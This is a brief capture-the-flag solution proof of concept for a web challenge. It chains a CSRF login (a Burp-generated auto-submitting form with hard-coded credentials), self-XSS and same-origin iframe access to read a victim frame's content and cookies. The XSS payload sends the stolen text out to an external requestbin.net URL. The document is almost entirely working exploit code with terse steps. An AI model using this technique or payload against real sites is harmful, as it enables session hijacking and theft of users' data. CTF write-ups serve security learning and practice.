Require: Self XSS, CSRF login, When valid session on new tab, no script relogin.
POC:
<iframe src="https://typeselfsub.web.ctfcompetition.com/flag" id="first"></iframe>
<iframe srcdoc='<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState("", "", "/")</script>
<form action="https://typeselfsub.web.ctfcompetition.com/login" method="POST" id="formlogin">
<input type="hidden" name="username" value="lala" />
<input type="hidden" name="password" value="lala@123" />
<input type="hidden" name="csrf" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.getElementById("formlogin").submit()
</script>
</body>
</html>
' id="second"></iframe>
<!-- self XSS:
<script>location="http://requestbin.net/r/r99y3cr9?"+(window.top.frames[0].document.getElementsByClassName("container")[2].innerText)</script>
1. Create Iframe 1 have Target Victim session on example.com
2. Create Iframe 2 have CSRF login as attacker –)) attacker session on example.com
3. Abuse SOP of Iframe 1 and Iframe 2, from self XSS in Iframe 2 –)) read data from Iframe 1 (include cookie, content, …) by using:
window.top.frames[0].document.cookie
0xD0ff9 